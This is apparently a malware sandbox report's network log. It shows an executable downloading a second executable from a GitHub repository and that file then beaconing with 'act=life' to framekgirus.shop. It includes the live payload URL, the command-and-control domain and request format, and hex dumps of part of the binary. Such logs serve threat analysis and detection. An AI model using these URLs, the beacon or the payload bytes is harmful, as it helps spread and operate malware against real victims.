                                                                                                                Dec 30, 2024 11:59:39.520131111 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.955893993 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.955987930 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.957762957 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.957773924 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.958015919 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:39.959794998 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.959878922 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:39.959897995 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414241076 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414300919 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414335966 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414367914 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414405107 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414422989 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.414436102 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414448977 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414484978 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.414504051 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.414640903 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.414717913 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.419006109 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.419055939 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.419066906 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.419106007 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.419171095 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.419179916 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.463392973 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.496398926 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.496468067 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.496498108 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.496524096 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.496536970 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.496783018 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.497013092 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.497092962 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.497148037 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.497193098 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.497205973 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.497322083 CET49733443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.497329950 CET44349733104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.924618959 CET49735443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.924674034 CET44349735104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:40.925343990 CET49735443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.925801992 CET49735443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:40.925825119 CET44349735104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:41.382616997 CET44349735104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:41.382704973 CET49735443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:41.384222984 CET49735443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:41.384232998 CET44349735104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:41.384565115 CET44349735104.21.18.19192.168.2.4
                                                                                                                Dec 30, 2024 11:59:41.386311054 CET49735443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:41.386460066 CET49735443192.168.2.4104.21.18.19
                                                                                                                Dec 30, 2024 11:59:41.386501074 CET44349735104.21.18.19192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 30, 2024 11:59:35.209794044 CET  59708        53         192.168.2.4  1.1.1.1
Dec 30, 2024 11:59:35.216619015 CET  53           59708      1.1.1.1      192.168.2.4
Dec 30, 2024 11:59:36.394910097 CET  62439        53         192.168.2.4  1.1.1.1
Dec 30, 2024 11:59:36.401918888 CET  53           62439      1.1.1.1      192.168.2.4
Dec 30, 2024 11:59:38.527523041 CET  63504        53         192.168.2.4  1.1.1.1
Dec 30, 2024 11:59:38.540111065 CET  53           63504      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
Dec 30, 2024 11:59:35.209794044 CET  192.168.2.4  1.1.1.1  0xcaf4    Standard query (0)  github.com                 A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:36.394910097 CET  192.168.2.4  1.1.1.1  0x7994    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:38.527523041 CET  192.168.2.4  1.1.1.1  0x99f5    Standard query (0)  framekgirus.shop           A (IP address)  IN (0x0001)  false
Timestamp                            Source IP    Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
Dec 30, 2024 11:59:35.216619015 CET  1.1.1.1      192.168.2.4  0xcaf4    No error (0)  github.com                        140.82.121.4     A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:36.401918888 CET  1.1.1.1      192.168.2.4  0x7994    No error (0)  raw.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:36.401918888 CET  1.1.1.1      192.168.2.4  0x7994    No error (0)  raw.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:36.401918888 CET  1.1.1.1      192.168.2.4  0x7994    No error (0)  raw.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:36.401918888 CET  1.1.1.1      192.168.2.4  0x7994    No error (0)  raw.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:38.540111065 CET  1.1.1.1      192.168.2.4  0x99f5    No error (0)  framekgirus.shop                  104.21.18.19     A (IP address)  IN (0x0001)  false
Dec 30, 2024 11:59:38.540111065 CET  1.1.1.1      192.168.2.4  0x99f5    No error (0)  framekgirus.shop                  172.67.179.160   A (IP address)  IN (0x0001)  false
• github.com
• raw.githubusercontent.com
• framekgirus.shop
Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
0           192.168.2.4  49730        140.82.121.4     443               7340  C:\Users\user\Desktop\eXbhgU9.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:59:35 UTC  116                OUT        GET /arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1
                                                       Host: github.com
                                                       Connection: Keep-Alive
2024-12-30 10:59:36 UTC  567                IN         HTTP/1.1 302 Found
                                                       Server: GitHub.com
                                                       Date: Mon, 30 Dec 2024 10:59:36 GMT
                                                       Content-Type: text/html; charset=utf-8
                                                       Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                       Access-Control-Allow-Origin:
                                                       Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe
                                                       Cache-Control: no-cache
                                                       Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                       X-Frame-Options: deny
                                                       X-Content-Type-Options: nosniff
                                                       X-XSS-Protection: 0
                                                       Referrer-Policy: no-referrer-when-downgrade
2024-12-30 10:59:36 UTC  3383               IN         Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                       Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
1           192.168.2.4  49731        185.199.110.133  443               7340  C:\Users\user\Desktop\eXbhgU9.exe
Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:59:36 UTC  127                OUT        GET /arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exe HTTP/1.1
                                                       Host: raw.githubusercontent.com
                                                       Connection: Keep-Alive
2024-12-30 10:59:37 UTC  903                IN         HTTP/1.1 200 OK
                                                       Connection: close
                                                       Content-Length: 1282048
                                                       Cache-Control: max-age=300
                                                       Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                       Content-Type: application/octet-stream
                                                       ETag: "e55fa9c7938c15739085744aba146381aba9c450768a46298b23f716bcfc6753"
                                                       Strict-Transport-Security: max-age=31536000
                                                       X-Content-Type-Options: nosniff
                                                       X-Frame-Options: deny
                                                       X-XSS-Protection: 1; mode=block
                                                       X-GitHub-Request-Id: BF68:11C8E1:497A95:52783C:67727D0D
                                                       Accept-Ranges: bytes
                                                       Date: Mon, 30 Dec 2024 10:59:37 GMT
                                                       Via: 1.1 varnish
                                                       X-Served-By: cache-nyc-kteb1890035-NYC
                                                       X-Cache: MISS
                                                       X-Cache-Hits: 0
                                                       X-Timer: S1735556377.933171,VS0,VE104
                                                       Vary: Authorization,Accept-Encoding,Origin
                                                       Access-Control-Allow-Origin: *
                                                       Cross-Origin-Resource-Policy: cross-origin
                                                       X-Fastly-Request-ID: 77ddab878468d8f33f5f44774790959f89a6ba90
                                                       Expires: Mon, 30 Dec 2024 11:04:37 GMT
                                                       Source-Age: 0
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 20 17 70 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 02 19 00 02 04 00 00 b2 00 00 00 00 00 00 b3 24 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 50 2d 00 14 02 00
                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL pg$@;@ P-
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: bd ac 1b b8 be 3a 9c 43 88 02 f4 bb 71 34 96 e2 84 03 b0 89 59 fa ab fb 0a 90 43 82 fd 40 fa 60 7c 3e e1 c2 61 5d 9d e4 f1 47 95 3c 28 a7 75 9a 27 5b 90 f6 05 bf 55 61 d4 2e 73 d8 a4 dd 82 85 2a b3 b5 af 28 7d 3d 8d 89 9b 66 29 75 aa 1d 35 ce 88 1a fa d8 b9 86 30 2b fc 5b d0 1d f6 c4 52 10 de cb 6b 54 86 05 43 f4 d6 01 c0 67 fc 09 6e e4 71 b1 57 f4 c8 68 6c 8b e5 c6 08 70 58 44 c7 f8 a3 c8 59 5c 67 f4 c5 75 37 37 2c de 4c ff 71 da 7f fd d1 17 29 f2 19 62 f9 a7 be 64 c1 0f 73 d6 a5 ba 35 47 6c 3b db 4c ba 1a 30 55 ab 03 2d 72 73 37 90 5f e0 93 74 48 2b 45 dc d5 4d bf 53 d4 f1 73 8e cc 3b c5 50 e3 59 27 12 66 f7 48 d5 80 74 5f 1b ea 85 28 6f df 49 8a 7f 71 6c b0 ea 29 15 b2 2d 72 55 09 ef 94 14 0b 67 13 dd f6 e4 56 dd f0 5e 98 ca 43 2e cb 48 b4 29 ad f6 7e
                                                                                                                Data Ascii: :Cq4YC@`|>a]G<(u'[Ua.s*(}=f)u50+[RkTCgnqWhlpXDY\gu77,Lq)bds5Gl;L0U-rs7_tH+EMSs;PY'fHt_(oIql)-rUgV^C.H)~
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 19 4e 1c ad de ee ab 08 34 08 23 2d ac 6c 66 8c 53 04 cc da 30 ef c2 16 8d fd 90 34 08 60 7c 64 ef ab 24 38 67 ce af 75 df b6 3b 61 c6 e6 6d b5 64 44 ae 89 84 d2 39 79 7a d0 c0 2f 90 ab 37 cf 81 07 82 b9 39 85 81 94 31 7c 5a 0f 11 78 07 f1 18 47 be d3 ce 66 99 aa ca 56 17 02 4c 23 5f 35 8b 6a e5 ee a5 88 17 06 7c 4b 81 68 b9 50 8f 17 b7 61 95 a7 3f ad fd fd 23 9f 48 a0 cd 45 08 6d ec c8 e5 3f 78 bd 21 7d cf 58 3d f3 95 8a 77 fd 03 53 dd 8a e9 aa aa b0 6b f9 9a a8 e8 82 2d 8f 9d 37 4b 65 b3 b6 6e bb 6e 45 a0 5f ef 07 e8 bf 56 53 e5 db 48 9c 2b 2c a4 3c 27 a0 bd da 98 dc d2 e9 10 08 1b 8e 49 7d e5 1e 0a 37 7e 89 f0 3e ed b3 bb 6a 0b 8d 51 9c 2d 53 57 99 cd 31 ae 4b 61 74 04 9e fa be 6c 05 cb 15 eb d9 dc ba 1a 2f 5a 72 0b 03 61 53 07 de 05 c3 3a 74 39 8a e6
                                                                                                                Data Ascii: N4#-lfS04`|d$8gu;amdD9yz/791|ZxGfVL#_5j|KhPa?#HEm?x!}X=wSk-7KennE_VSH+,<'I}7~>jQ-SW1Katl/ZraS:t9
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 02 a6 76 e5 f1 62 9a 08 2f a9 25 89 6a 79 32 31 a8 63 72 56 02 39 6a b0 1a c6 c9 4c 5b 7e 33 94 78 25 22 1d d8 ef 85 54 6d 65 55 4d ec 68 73 13 85 a2 6d 36 f4 63 69 74 20 8f 62 19 a7 ba 00 5f e9 20 78 c2 2a fc de f4 f5 94 aa 59 57 50 bf 71 ec c3 24 51 1f e1 a3 8b 21 b2 a3 80 18 db c4 30 7d 87 85 c4 ac 5d af 44 db f6 1f c2 c3 ea 81 95 c7 d7 c2 f4 7a 7e c6 17 06 df de c5 50 b6 59 9f 0c be 15 52 b7 ec 96 cc 7c 9f f8 0f 4a 29 43 d1 3e 34 cc b4 b3 b8 7a c5 2c f1 70 0b 3e 54 66 6e 29 11 c9 68 ce bb 3a 75 80 6e 55 17 38 c2 03 6e b5 8c 61 48 c3 3f a4 9a b7 c6 1b cd a1 f5 86 14 cd 79 df 1a 12 c3 94 39 1b f0 e4 72 f8 01 73 1c 24 ce ff c6 77 fe 4d d6 35 5a f2 12 5d 35 ac c4 4b 1f aa 23 f8 ea 00 a4 64 61 17 fd 48 55 95 31 8f 6e c2 60 39 75 9c fc 43 25 c1 6d 13 5f ba
                                                                                                                Data Ascii: vb/%jy21crV9jL[~3x%"TmeUMhsm6cit b_ x*YWPq$Q!0}]Dz~PYR|J)C>4z,p>Tfn)h:unU8naH?y9rs$wM5Z]5K#daHU1n`9uC%m_
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 07 6e 3b 06 01 27 88 e5 a4 8a da 1a 93 86 93 4d dd dc a9 cb 0b 9d f3 a5 1c a2 a5 d3 77 8d ab 67 7b e6 ee 3b b8 eb a3 7e 4e 4e 76 4c 38 39 25 de 80 24 31 88 90 9b ec e1 1b 49 a6 83 d9 7b 4b 06 6b 01 60 2f 13 bc 24 81 4f c9 43 a0 0a c3 db 24 d7 d9 cb 86 ed 04 3f 08 a0 0f 96 0f aa 75 1c 1d 92 15 bc 26 a6 9d f6 92 9f 51 86 42 38 b8 70 c0 ef 05 8d 82 31 5d d2 fd e3 56 fe 40 6f af fe 16 fb f8 5b 33 3f e4 7a 62 33 d9 84 e7 c3 57 07 40 c3 a5 f9 47 45 31 b6 45 76 7d 15 c1 06 45 af 83 72 d0 3b 27 f8 ef e2 be fa a9 ab 80 68 ac ee 45 a3 32 f6 ba 48 06 ab 15 ee f7 0d b5 db 91 0b 64 90 68 5e 1e 8e 65 ee a7 ba 96 0c 0e 08 06 82 0f 63 c8 b5 82 30 92 fe f0 cc e6 96 2e ec 87 ca b2 15 8d 0a b4 5a 9f e0 50 b2 e1 a2 00 d0 10 65 df a3 2c 70 af b0 4e 12 6d 14 7f 88 6b cc a6 08
                                                                                                                Data Ascii: n;'Mwg{;~NNvL89%$1I{Kk`/$OC$?u&QB8p1]V@o[3?zb3W@GE1Ev}Er;'hE2Hdh^ec0.ZPe,pNmk
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: ac d9 12 91 56 dd a6 66 81 da 65 07 28 7e 7a 39 39 d8 49 bf cd d7 e2 6a 69 df c1 cc 08 63 fd 31 58 3b 15 a8 c9 62 34 b1 26 08 80 25 f7 a6 ca eb 0a 62 e6 c7 3b eb 5f fc 20 cb 5b ba c2 d8 99 b6 74 54 d6 d6 8d e2 ab 65 ef 16 08 c6 65 4f 0d b8 c0 d5 63 ff ea 6d 2f fb d1 2c b4 9b 76 e7 63 16 36 e0 be 78 41 7c 30 73 50 ed 18 1a 88 0f 04 59 2a b8 ea 38 27 38 df 27 f0 5b 03 78 5a 6a 7b 6b f0 22 d3 cf 84 f6 af 53 28 21 d4 55 0b a6 72 36 49 5f 90 59 55 7f 81 2d 00 d9 65 10 ee ff 7e 03 99 9e 08 8d 5d 7f 26 d6 1f ab a9 ef c2 43 e2 5c ac f8 45 9f e0 c9 e4 ba 02 20 22 25 76 4b 92 e8 ac 24 3c bf 37 0a 4b f6 5f fb 68 19 a2 d3 34 d4 0a 82 f8 9c f1 a5 2c 9e b9 fe b0 fb 19 7f eb b8 5e c5 0d 25 19 69 df c2 c8 65 45 f1 71 77 13 c1 03 9c dc 9f df 85 13 f4 5a d9 38 16 12 0d 69
                                                                                                                Data Ascii: Vfe(~z99Ijic1X;b4&%b;_ [tTeeOcm/,vc6xA|0sPY*8'8'[xZj{k"S(!Ur6I_YU-e~]&C\E "%vK$<7K_h4,^%ieEqwZ8i
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: b9 e5 79 44 d8 a3 44 c2 44 e6 02 94 c5 c1 f5 4a bc 38 88 9b 3c 91 23 19 18 b0 10 eb ac 22 c2 18 f7 ac aa b9 c1 3f 3d 2d e9 55 01 ca 78 75 a7 18 09 e2 81 71 d8 c9 9f 23 7f ad 7f 1f 0e 8b b1 3b cc e2 2d 85 7b e4 ae 7c 71 cb 7d 4e 2c 8e aa ba 12 8a a9 1e 47 53 aa b4 83 2d 95 23 13 47 94 03 b0 9a 37 07 fa d5 b6 fa 3d 6b c3 a6 e9 d0 0e 30 5f 42 dc 51 a8 e7 13 40 2a e2 37 c1 62 95 de a8 4f 9a de 22 d5 ea f2 da 11 ee 82 1e 78 f8 17 26 55 8b 14 aa 85 6b 98 43 20 bf d7 0d b3 ac 3b ef 51 e9 34 93 fe 03 c8 38 ce c2 c6 b6 a1 91 95 f8 9a d3 1b e5 ea 5f a9 ae 1f 55 27 25 b7 a0 c8 a1 95 97 f4 0a ce ab af 55 a6 c9 0c b0 cc c8 5b 4a f5 41 e3 06 06 95 e6 36 68 8c 87 83 b8 8e fa bf 8d f8 da b1 17 d3 12 f5 50 01 c7 e9 26 ef cf ea 72 1e f8 fb ca 2a 3c c5 0d e6 03 c1 af aa 88
                                                                                                                Data Ascii: yDDDJ8<#"?=-Uxuq#;-{|q}N,GS-#G7=k0_BQ@*7bO"x&UkC ;Q48_U'%U[JA6hP&r*<
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: c2 6c cd be 1c a1 af 7d 77 64 27 9f 05 71 57 7f 12 ac 6e 8e 2d a5 8a 16 7c ef a2 f7 2d 89 0a f4 c6 ee 8f db 44 09 bf c8 c4 46 3a e5 74 12 94 20 bb ba 1e 4c b4 93 9d 52 4c 9a b9 ff 5a 57 74 d2 b8 17 1b b5 50 ac a1 4a 1d 48 9b b1 26 58 02 12 8f 00 48 dd c5 61 f7 ee a6 1f 8e a1 6a 20 4b 7f 7a 37 53 f9 48 a9 fc b8 83 87 40 f9 a5 7e b0 5e 84 26 c2 9b 59 de d0 c1 3c 42 df 52 fe fc 96 cd b4 3d 4c ed c0 da 4b 2a 1f b2 e7 77 e6 f4 1e 36 6a 69 89 79 2e 30 91 c6 57 58 1a 2f 81 2c 84 ff 8a 9f 23 de d4 a3 39 9a 96 07 65 22 ff a9 2d bd 40 dd fc d0 62 d5 98 ce a9 f1 a6 26 d4 4a 85 b6 98 37 00 9f 4f b0 f9 7f a3 25 35 8e 9b 29 3e 0c 84 64 23 03 a3 ea e4 d0 59 3b 2f ae 82 c3 f0 b3 5b c8 56 22 79 39 f5 3b ca 94 2f 59 e3 ac e4 ba 30 86 23 f8 b2 36 9b da 49 bd 4e d4 91 82 6d
                                                                                                                Data Ascii: l}wd'qWn-|-DF:t LRLZWtPJH&XHaj Kz7SH@~^&Y<BR=LK*w6jiy.0WX/,#9e"-@b&J7O%5)>d#Y;/[V"y9;/Y0#6INm
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 2b 85 ae 3b 8e 38 c7 93 bb f9 32 97 86 73 12 60 00 5c ce 28 57 26 da e0 97 44 15 81 30 14 37 d2 f1 8b ae 70 77 43 1c 09 93 b3 3a 78 52 6b 15 8b bd f2 85 16 5b f8 09 58 88 53 d9 63 3a fb eb 8c dd 29 43 69 7e 4b 4f 8b da f2 e7 98 65 be 9a 3e 17 9b 80 45 1f eb 47 7d d2 d0 12 c3 e0 59 dd 70 39 b5 b7 90 84 08 6a 69 17 84 72 a9 de a7 44 df 6b 74 09 1b 83 96 94 a7 56 88 46 ba bd 17 e1 92 c9 17 a4 17 e9 51 41 7b 11 8b 8f 9d 48 d5 b3 8c 15 d1 18 6d 96 d3 34 12 a2 ad 41 1a d5 e2 88 95 d8 2b 76 fc e5 4b f5 ce 60 76 50 aa 9b aa 75 50 2e f3 9c 65 01 8c bb 68 78 e9 be a3 94 1b 83 c4 7d 81 1c c8 9f 49 9a bd 06 61 68 f1 50 5a 3a eb b8 6e 2c 1c 74 cf 36 fc 11 77 92 a0 ce bc 1c 58 21 3a e1 43 f6 19 3e 87 7b f7 63 93 ad e6 20 c1 56 ff 6e 6c 80 22 ad ac d8 24 0d 79 84 2a 14
                                                                                                                Data Ascii: +;82s`\(W&D07pwC:xRk[XSc:)Ci~KOe>EG}Yp9jirDktVFQA{Hm4A+vK`vPuP.ehx}IahPZ:n,t6wX!:C>{c Vnl"$y*
                                                                                                                2024-12-30 10:59:37 UTC1378INData Raw: 2d 99 8f 4d 08 49 4d 83 be 36 50 52 82 12 a7 98 9d f2 59 31 0d f2 dc a5 17 b6 e3 62 30 57 40 72 68 55 b6 36 65 92 76 69 ce 73 95 43 48 75 d1 d0 3c bb af a3 cf 92 e2 a6 67 01 51 3e ca 4f 55 08 22 de 3b 36 b0 a1 9a 2b e1 09 97 87 5a 63 94 69 f8 82 4e 9c 2e b2 5b ff a3 48 c8 41 c6 3a b7 71 20 c0 b9 99 1e 84 de 5b 5a 27 14 5d f5 1e 35 f4 19 77 1f 84 72 c0 99 8b fc de 7c 09 31 e6 9c 28 2e 77 c5 ac 1b d8 26 ea 24 d2 61 87 f0 bb 1f 7b 24 d5 b4 7a 7a ea 8f 51 f3 9f 8c 58 cf 45 f8 0f cf 74 6e 93 ca 78 ff cf 66 ef 7a 5f 39 24 3f e9 f6 a9 94 0b e4 84 7f ce a8 b5 5f ef ba 13 c1 44 54 25 35 fb 9a 4e 74 37 16 93 2e 67 a4 08 16 c1 2d b0 6a 0c 10 13 a0 a2 68 40 26 18 24 e8 fc b8 b2 31 f3 e1 53 b5 a2 ec 73 f8 58 30 ee d2 c8 d2 ec 0f ad 82 94 b8 4b a9 cb 49 a8 df 60 ba 4f
                                                                                                                Data Ascii: -MIM6PRY1b0W@rhU6evisCHu<gQ>OU";6+ZciN.[HA:q [Z']5wr|1(.w&$a{$zzQXEtnxfz_9$?_DT%5Nt7.g-jh@&$1SsX0KI`O


                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                 2 | 192.168.2.4 | 49732 | 104.21.18.194 | 443 | 7940 | C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                 2024-12-30 10:59:39 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8
                                                                                                                Host: framekgirus.shop
                                                                                                                 2024-12-30 10:59:39 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                Data Ascii: act=life
                                                                                                                 2024-12-30 10:59:39 UTC | 1117 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:39 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=9q32ropqacndrb4ptc4o5gqjao; expires=Fri, 25 Apr 2025 04:46:18 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zWxnmJGJFUyId0mdCBWrdtSI%2F1LoIcj83cTgKOMUs3EUgXZBbsm7KVQFomA448g3PYx5dGSb669sjoWALBhN3CHMlQxzvZEL2mKA3iLGAmwhnAZA17AsjU2VWU59unnOGaAB"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa18589ab25182d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1740&rtt_var=665&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1629464&cwnd=145&unsent_bytes=0&cid=82ea2ef5e1851686&ts=475&x=0"
                                                                                                                 2024-12-30 10:59:39 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                Data Ascii: 2ok
                                                                                                                 2024-12-30 10:59:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                 3 | 192.168.2.4 | 49733 | 104.21.18.194 | 443 | 7940 | C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                 Timestamp | Bytes transferred | Direction | Data
